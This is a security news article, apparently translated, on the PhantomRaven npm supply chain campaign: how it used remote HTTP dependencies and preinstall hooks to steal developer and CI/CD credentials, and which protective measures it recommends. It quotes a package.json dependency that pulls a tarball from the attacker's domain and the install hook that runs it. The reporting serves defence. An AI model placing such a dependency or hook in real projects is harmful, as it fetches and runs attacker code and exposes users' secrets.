The ongoing PhantomRaven npm supply chain attack is a sophisticated malware campaign targeting developers worldwide. Since August 2025, the attack has distributed 126 malicious npm packages which together have been downloaded more than 86,000 times. The aim is to steal npm authentication tokens, GitHub login credentials, and CI/CD secrets, while using advanced detection evasion techniques to bypass most security tools.

Analyst at Koi Security identified the campaign in October 2025 when their behavior monitoring system, Wings, flagged suspicious network activity during package installations. All malicious packages made external requests to the same domain, which revealed a coordinated and global Operation.

How PhantomRaven npm supply chain attack works

The investigation by Koi researchers revealed a clear timeline. The first 21 packages were discovered and removed in August 2025. Shortly thereafter, the attackers adapted their strategy and managed to publish an additional 80 packages between September and October that completely evaded standard detection mechanisms. The attacker's infrastructure shows a contrast between technologically advanced execution and surprisingly careless operational security.

Advertisement

To hide the malicious code, the attackers used a technique with remote dynamic dependencies. It allows dependencies to be defined via HTTP URLs instead of via the npm registry, for example:
“ui-styles-pkg”: “http://packages.storeartifact.com/ui-styles-pkg.tgz”.
When such a package is installed, npm automatically fetches the external dependency without any security validation or transparency.

This means that the code that is uploaded to npmjs.com may look completely harmless – often just a “hello world” script – while the actual malicious payload is dynamically retrieved from the attacker’s server upon installation. In this way, PhantomRaven attackers bypass both static code analysis and dependency scanning.

Hidden dependencies and automatic execution

When the invisible dependency arrives on the victim's system, the malicious code is immediately activated through npm's lifecycle script. The manipulated package.jsonThe file contains a preinstallation script, “preinstall”: “node index.js”, which is automatically executed without the user’s knowledge. It doesn’t matter how deep in the dependency tree the package is located – any installation of a seemingly legitimate package can trigger the malicious execution.

The PhantomRaven npm supply chain attack thus exploiting npm's inherent flexibility to deliver malicious code in real time. Since each installation retrieves the dependency anew from the attacker's server, the payload can also be adapted to the target environment, making the attack very difficult to detect and stop.

What the attackers collect

After a successful installation, PhantomRaven systematically collects email addresses from environment variables, gitconfigfiles, npmrc-configurations and author fields in package.json. It also exfiltrates CI/CD credentials, including GitHub Actions tokens, GitLab CI keys, Jenkins logins, CircleCI tokens and npm publish tokens.

The malware then performs a full system profiling: public IP addresses, hostnames, operating systems, Node.js versions, and network configurations are collected to differentiate between corporate networks and individual developer machines. This information is used to identify valuable targets where attackers can gain greater access or spread.

Operational negligence and tracking

Despite the technical prowess, the infrastructure shows signs of operational negligence. Several email accounts were created sequentially via free services – from jpdtester01@hotmail.com to jpdtester13@gmail.com – and username as npmhell and npmpackagejpd recurs in multiple packages. This inconsistency has allowed researchers to trace the campaign to a single actor, giving hope for future identification and prosecution.

Recommended protective measures

1. Rotate all tokens and API keys (GitHub, npm, CI/CD) that may have been exposed.
2. View package.jsonfiles and identify any dependencies that reference HTTP URLs. Block or remove them.
3. Implement SBOM tools such as CycloneDX or SPDX to gain full visibility into dependencies and version history.
4. Limit token permissions, use short-lived secrets, and enable automatic rotation.
5. Introduce behavioral monitoring in CI/CD environments, such as sandbox analysis of new packages before they are deployed.
6. Follow OWASP Software Component Verification Standard for safe handling of third-party dependencies.
7. Consider using private npm registries and validating dependencies before publishing to reduce the risk for manipulation in open ecosystems.

Analysis and importance for the industry

The growing scale of attacks that PhantomRaven npm supply chain attack clearly shows how the dependency chain has become one of software's biggest vulnerabilities. As companies build on open source and thousands Third-party packages increase the risk that a single compromised component will have huge consequences.

For IT organizations, this means that security is no longer just about networks or end users – it’s about the entire development chain. Secure code management, reliable dependencies, and continuous analysis of the supply chain become a strategic issue rather than a technical detail.

The campaign also shows that attackers have started to think like developers: they are exploiting existing features in tools like npm to spread malware in a way that looks completely legitimate. This requires a change in how companies monitor and verify their software.

For Swedish and Nordic companies, the event underlines the importance of building expertise in software supply chain security and to comply with international standards. Through proactive control, shared information and open collaborations, the industry can be better prepared for the next big attack.